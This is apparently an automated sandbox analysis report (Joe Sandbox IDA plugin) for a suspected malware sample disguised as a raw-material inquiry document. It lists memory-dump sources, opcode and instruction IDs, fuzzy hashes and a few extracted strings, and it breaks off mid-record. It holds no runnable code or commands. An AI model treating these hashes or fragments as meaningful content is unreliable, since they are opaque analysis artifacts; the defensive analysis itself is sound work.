                                                                        • Instruction Fuzzy Hash: 1241E3707016009BD629AB29CA85B7BB79AEFC0364F589219FC5DA7285DF30DC01C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 2fc190a86f1ce088b5601c65ae95d93409a32f9d37759b49fc9520c8580d302b
                                                                        • Instruction ID: cece590e4babc73219ed5c3e43e6649d66780be2c8085aed60008736f00ff174
                                                                        • Opcode Fuzzy Hash: 2fc190a86f1ce088b5601c65ae95d93409a32f9d37759b49fc9520c8580d302b
                                                                        • Instruction Fuzzy Hash: F7419072508352ABD710EA75C881B6BB7E8EF88B04F44092EF584EB281E674D904C7B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \
                                                                        • API String ID: 0-2661760580
                                                                        • Opcode ID: 160ac0260a798811c787cf8e89ff6f230184a66d51a9f50c85e487f937bce238
                                                                        • Instruction ID: e45c347c717690c28a4868f0400c3a92b0357dd9c3dd0d82b096202b9d7cb21e
                                                                        • Opcode Fuzzy Hash: 160ac0260a798811c787cf8e89ff6f230184a66d51a9f50c85e487f937bce238
                                                                        • Instruction Fuzzy Hash: F541B1712047419FD724EF25D881A27B7E9FF88318F24493AE996D7311EB35E8448B61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: pf
                                                                        • API String ID: 0-1435391446
                                                                        • Opcode ID: 8eb8cc3375bae12c58dc23616e56f76fb30dc80e76d71a06e94ac430a9d7ade1
                                                                        • Instruction ID: 510b76dae8c72761717896d28e0c6d890aed68e336805e9a6c8ca62ad12d5da7
                                                                        • Opcode Fuzzy Hash: 8eb8cc3375bae12c58dc23616e56f76fb30dc80e76d71a06e94ac430a9d7ade1
                                                                        • Instruction Fuzzy Hash: F8418D75A00229DACB21DF68D941FEA77B8EF45740F0501AAF948BB381D774DE80CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 7bd2988f95156650e97397eaabf945c51a5b4a8c28fdfe5a575df6a722e8aca6
                                                                        • Instruction ID: 8cb5a6b536102373c35a004c7a16e769ebc3a68c35ef8b7dff4dac5b634bd046
                                                                        • Opcode Fuzzy Hash: 7bd2988f95156650e97397eaabf945c51a5b4a8c28fdfe5a575df6a722e8aca6
                                                                        • Instruction Fuzzy Hash: 7A4133B1D0052CAADB21DB60CC85FDEB7BCAB45714F1055A5EB08BB141DB70AE89CFA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @3
                                                                        • API String ID: 0-142348992
                                                                        • Opcode ID: cf525933855f8a84fe58e0d4f8321f262a459d10c35a505316bd2f9b37ca708c
                                                                        • Instruction ID: 6f71d533abde0f3f2139087d1bde8ea41936469f01686c76d53d5e19df0ad455
                                                                        • Opcode Fuzzy Hash: cf525933855f8a84fe58e0d4f8321f262a459d10c35a505316bd2f9b37ca708c
                                                                        • Instruction Fuzzy Hash: 46419C71A41269CFCB21EF69D8917AA77B0EB08314F1412A5E411BB3E2DB34E944CBB1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: iu'
                                                                        • API String ID: 0-1265149032
                                                                        • Opcode ID: efcbe581bdb401c53f132a9a7f129a7d44f30f81be702b320faf64a100f7cc57
                                                                        • Instruction ID: 3e3b82856ed92cdb563c967bfa448c7570b5c695d67612c388b7c7f927b7dd59
                                                                        • Opcode Fuzzy Hash: efcbe581bdb401c53f132a9a7f129a7d44f30f81be702b320faf64a100f7cc57
                                                                        • Instruction Fuzzy Hash: 14418EB25043509FD320DF29D845B9BBBE8FF88754F104A2EF698E7291D7709944CBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: 21330bde81ad56cbec0736ee32990534f107d5003c4bf9beca196da75a7d4ba4
                                                                        • Instruction ID: 76fc1f61862dcaf25be0873efda3874c60a8a510a284e6ff1e43e2251bf022a5
                                                                        • Opcode Fuzzy Hash: 21330bde81ad56cbec0736ee32990534f107d5003c4bf9beca196da75a7d4ba4
                                                                        • Instruction Fuzzy Hash: 423126316007589BDB22DB69C850BEEB7B8DF54709F904428ED80BB282CB75DD09CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: 57d8383ba73f471f8da1e87ab7917f4d11f449b59c17d0a53d17d00f3f27d5ad
                                                                        • Instruction ID: e12284c35ac1ac4b3c2127b7034465665096ae658df8b8c4364d09fddbc785f0
                                                                        • Opcode Fuzzy Hash: 57d8383ba73f471f8da1e87ab7917f4d11f449b59c17d0a53d17d00f3f27d5ad
                                                                        • Instruction Fuzzy Hash: CA312236900519AFEB15DB59C84AEAFFBB4EF80764F214529E905B7290D730DE00CBE0
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00E4895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: 7ff4157c0dab4308b5fbd22c31e1222bf36fddd4f3fc925034ebd28271874d0d
                                                                        • Instruction ID: 5fcd429a073bcb453564080057e64852087210bb0c4c90e174b3faa6a9996292
                                                                        • Opcode Fuzzy Hash: 7ff4157c0dab4308b5fbd22c31e1222bf36fddd4f3fc925034ebd28271874d0d
                                                                        • Instruction Fuzzy Hash: AD012432201A01AFD6256F11FE85BBF3765EFC5354F082428F74532562CF206C45C6A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7bac9637315ff736b0eb41577e9e64caca3e598eb61c6d1ca44082ea61215bd9
                                                                        • Instruction ID: 6882b6f6cbc1ccbc95fb5e8b70ac5eb4a8c6ce6f955f9fd6a735dfb739eeb8fc
                                                                        • Opcode Fuzzy Hash: 7bac9637315ff736b0eb41577e9e64caca3e598eb61c6d1ca44082ea61215bd9
                                                                        • Instruction Fuzzy Hash: 88821172F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f1c65391f30b5ce837aefc4a2c4c1e4a932e87e4bc53a71746931d46d1670cc
                                                                        • Instruction ID: 90fdde5b3da644344b82a7b262767526da302029a7583a6d7450014d0f3e2c43
                                                                        • Opcode Fuzzy Hash: 5f1c65391f30b5ce837aefc4a2c4c1e4a932e87e4bc53a71746931d46d1670cc
                                                                        • Instruction Fuzzy Hash: 2E627B33904A4AAFCF14CF08D8905AFBB72FE55318B59E659C89A37654D331BA84CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93bdfd691ec52c82d2da06f4676f7151343ebdf48c33d7b08fb9aa3b2670c62b
                                                                        • Instruction ID: cd3edc228d08e71df664d511afbc47ba1c09da695aa3baebf47e72a828086652
                                                                        • Opcode Fuzzy Hash: 93bdfd691ec52c82d2da06f4676f7151343ebdf48c33d7b08fb9aa3b2670c62b
                                                                        • Instruction Fuzzy Hash: 2F42F132648B418FDB25CF64D890A6BB7E5FF88384F18592EFA92A7250D730DC45CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d8f668f3071da249d4c645101314bbcdbfb016fdf05abdeae0d21f988a0c2c3
                                                                        • Instruction ID: 3f42085db50532e7f7199e462fc181eba3d66b29c212fea254cd7942c8d0d5d5
                                                                        • Opcode Fuzzy Hash: 0d8f668f3071da249d4c645101314bbcdbfb016fdf05abdeae0d21f988a0c2c3
                                                                        • Instruction Fuzzy Hash: 01428071A086168FDB18CF59C490AEEB7B2FF88714B249559E496BB340D734ED81CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                        • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                        • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                        • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fce5c217e56823572b38dba74d2f55237eba0aea5e7c49f1a9922eb56ae6bf04
                                                                        • Instruction ID: ddde327b0029a03f6508bb6bc21471523b94b43ea14a382599abda95b0583a25
                                                                        • Opcode Fuzzy Hash: fce5c217e56823572b38dba74d2f55237eba0aea5e7c49f1a9922eb56ae6bf04
                                                                        • Instruction Fuzzy Hash: F6424975A002198FEB24CF69C981BADB7F5FF48305F14859AE849BB242DB349D85CF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a36d80a640a2c0ff3c3eccf853d234fcb4ec491d09dc716572a22a77507b061
                                                                        • Instruction ID: d3dbb39b85775c45dca4d5f97d7c22155390d7863ab192ea5fcaa5d18d173e4d
                                                                        • Opcode Fuzzy Hash: 1a36d80a640a2c0ff3c3eccf853d234fcb4ec491d09dc716572a22a77507b061
                                                                        • Instruction Fuzzy Hash: 8E32C070A007658FDB28CF69D8547BEB7F2BF84308F24561EE496AB285DB35A841CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 748b4c973b3c2859a6fcc56f6457475cb4c0fa17ec8eee77043e59a5677630f9
                                                                        • Instruction ID: eda150b991d6b33d29def633965a2fa501d1559918604127761e8934c6674a69
                                                                        • Opcode Fuzzy Hash: 748b4c973b3c2859a6fcc56f6457475cb4c0fa17ec8eee77043e59a5677630f9
                                                                        • Instruction Fuzzy Hash: DB220570A846508FD724CF29E0543B6B7F1AF45388F1CA46AD896BF286D734E841DF62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54b58aa45766b54ac32bf268c8dd3e96a23e98b3e01e5f0953362697c6bd15ad
                                                                        • Instruction ID: 3ac874dcd26812f881486b598461cdc2d26bc94c2497c85f97660e2c22c70f59
                                                                        • Opcode Fuzzy Hash: 54b58aa45766b54ac32bf268c8dd3e96a23e98b3e01e5f0953362697c6bd15ad
                                                                        • Instruction Fuzzy Hash: C0229235A002168FCB19DF58C490ABAB7F6FF89318B2455ADD45DEB345EB30AD42CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9513a45ceb9000907d8708870fdc2c6355af6c7e75813ad5a64625f5605dcc0
                                                                        • Instruction ID: f60ae99cd5a3750ec8213b1933001c71606e7ecc79eacaeb0afc8f4d28532945
                                                                        • Opcode Fuzzy Hash: c9513a45ceb9000907d8708870fdc2c6355af6c7e75813ad5a64625f5605dcc0
                                                                        • Instruction Fuzzy Hash: 48226E70E0426ADBCB14DF56D8809BEFBF2FF44704B64805AE959AB241E734DD81DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1e7bec7fffa7f1069649c1a3e543496342b5e2bef45fbdd6a938a19c46fd7ee
                                                                        • Instruction ID: c67020f856dc01c650e70b294536e3f68f0f030f4f4cac142eb853d16ac257b5
                                                                        • Opcode Fuzzy Hash: c1e7bec7fffa7f1069649c1a3e543496342b5e2bef45fbdd6a938a19c46fd7ee
                                                                        • Instruction Fuzzy Hash: FA327A71A05215CFCB25CF68D480BAAB7F2FF58304F2485AAE956AB391D734ED41CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: def2ec388e9352224ac755d2a66f0bacca8849344b4b392cfe02c8da34856998
                                                                        • Instruction ID: bfeb94f2d9a74ddf2af5c32cf9333bb05379d5b26175634ce7f271095018a66f
                                                                        • Opcode Fuzzy Hash: def2ec388e9352224ac755d2a66f0bacca8849344b4b392cfe02c8da34856998
                                                                        • Instruction Fuzzy Hash: 230215346006518FDB18EF2AC4503B5B7F1AF84304B19919EEADEEF281E335D842EB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                        • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                        • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                        • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8d559db7fc3d1f0120c7dc09b0640204f306fe47afc091d199a2f2854a7a49a
                                                                        • Instruction ID: 14e8defb2a8eedef45cf30c35c18a840696e49f1056fee4a173ce949c2671768
                                                                        • Opcode Fuzzy Hash: e8d559db7fc3d1f0120c7dc09b0640204f306fe47afc091d199a2f2854a7a49a
                                                                        • Instruction Fuzzy Hash: 28027CB1E0021ACFCB04DF98C5806ADBBB2FF99304F259169D45EBB395E730A942CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b33e0d31ec54a00e67f5a7bcd7117a4e7f01d5e9d97586eaacacea6ffe0d43ce
                                                                        • Instruction ID: 1840463576e93160530a0178dcc1adbf18d07388d67ecda771884bdcf0513ba3
                                                                        • Opcode Fuzzy Hash: b33e0d31ec54a00e67f5a7bcd7117a4e7f01d5e9d97586eaacacea6ffe0d43ce
                                                                        • Instruction Fuzzy Hash: BFF1E372E006118BCF18CF69DAA167EBBF6EF9830071A5169D466EB391E734ED40CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72816def0dd79878f7dd9eec28eec35c6658c757e415882ff48d7294c270e7f8
                                                                        • Instruction ID: ab24f9a8176398fa922787cbbc0219bc76c3622462a6a7b4495905973b9aba39
                                                                        • Opcode Fuzzy Hash: 72816def0dd79878f7dd9eec28eec35c6658c757e415882ff48d7294c270e7f8
                                                                        • Instruction Fuzzy Hash: 1EF19F72E005269BCF18CEA8C5A15BDFBF5AF54314B195279E856FB380E634AE40CBD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: dd6e2a4ac9ea7a46ef35e8f764e507db27fe45483c9e4e75c06acda90a66d0aa
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: BAF19D70E002599BCB19EFA6D990BAEB7F5EF48714F188129E945AB240E774EC41CB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0218651aeb6c03da52bd4b162232b3734f190e5761b8b596d9b963f5c309649e
                                                                        • Instruction ID: a2dafbe6eceacd7e07990b89dbae3de91012e5ef556847e1d66e099803e0f32e
                                                                        • Opcode Fuzzy Hash: 0218651aeb6c03da52bd4b162232b3734f190e5761b8b596d9b963f5c309649e
                                                                        • Instruction Fuzzy Hash: 38E11231A002859FDB24DFB8C4407FEBBF1AF48314F58D41EE49ABB281D635AA85DB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 519586f063ba851d187765464c62fe49b92be9730dab22024b1a776dc6d464b9
                                                                        • Instruction ID: 33a792a806994bd71404e7c30cf80eb4f39930faf19777beae9d83f1793df591
                                                                        • Opcode Fuzzy Hash: 519586f063ba851d187765464c62fe49b92be9730dab22024b1a776dc6d464b9
                                                                        • Instruction Fuzzy Hash: B1D10271E006198BDF09CF58C941AFEB7F5AF88306F18896AD855F7281DB35E909CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 631282f04115b534ee5af43adf8304d919cc0826542c7d285150da7606145024
                                                                        • Instruction ID: 16c72aacf1e9646aebc867c0fe659eba96888722295c89d700fdad06ff5f74b8
                                                                        • Opcode Fuzzy Hash: 631282f04115b534ee5af43adf8304d919cc0826542c7d285150da7606145024
                                                                        • Instruction Fuzzy Hash: 98E17E71508342CFC714CF28C490B6ABBE0FF99318F158A6DE99997391DB31E945CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56c99ed0681f4630fdcfd2a398a8ce0eb532cebf0b5cbf698804ead34b0a846a
                                                                        • Instruction ID: 26f07cf600a1fb78a469f37f9f1f714e3bfaf0e043640cc2452eb2a8c9c1ab52
                                                                        • Opcode Fuzzy Hash: 56c99ed0681f4630fdcfd2a398a8ce0eb532cebf0b5cbf698804ead34b0a846a
                                                                        • Instruction Fuzzy Hash: C3D1AE71A00616DBCB14DF64C881AFAB3AAEF54308F144629F956AB281EF34D985DB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c7948539b808982ef7639503e5b7b59c9d00a869f97527c0285e31872685d9a
                                                                        • Instruction ID: 4e82abcdf4bda1549f8cc8fcf796a5dd0c7c7eecf6fde143b4d930642fd3614e
                                                                        • Opcode Fuzzy Hash: 5c7948539b808982ef7639503e5b7b59c9d00a869f97527c0285e31872685d9a
                                                                        • Instruction Fuzzy Hash: A2D1B671E242998BDF28EF8AC5813BDB7B1FB44304F28A02AD452E7281C7748D43DB65
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca432b663ffec6bf8c74126af48fe32b7337f917206649eb71fded18bc3c615e
                                                                        • Instruction ID: fc6248b3dd9cc416b58db63b081cdab6f6d40bdac8eeb910584f159660cd421b
                                                                        • Opcode Fuzzy Hash: ca432b663ffec6bf8c74126af48fe32b7337f917206649eb71fded18bc3c615e
                                                                        • Instruction Fuzzy Hash: 0DE18F75A00215CFCB18CF58C990AAAB7F1FF58310F29815AE856EB391D734EE45CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                        • Instruction ID: 889c62e63abaa4e2c40e47fb64c70684ae0d4960716d3c47e68d057125bf328b
                                                                        • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                        • Instruction Fuzzy Hash: 04B15622B105748BEB1C9A19C8A137E3363EFE5320F2D9279D8575F7E9CA789D009352
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
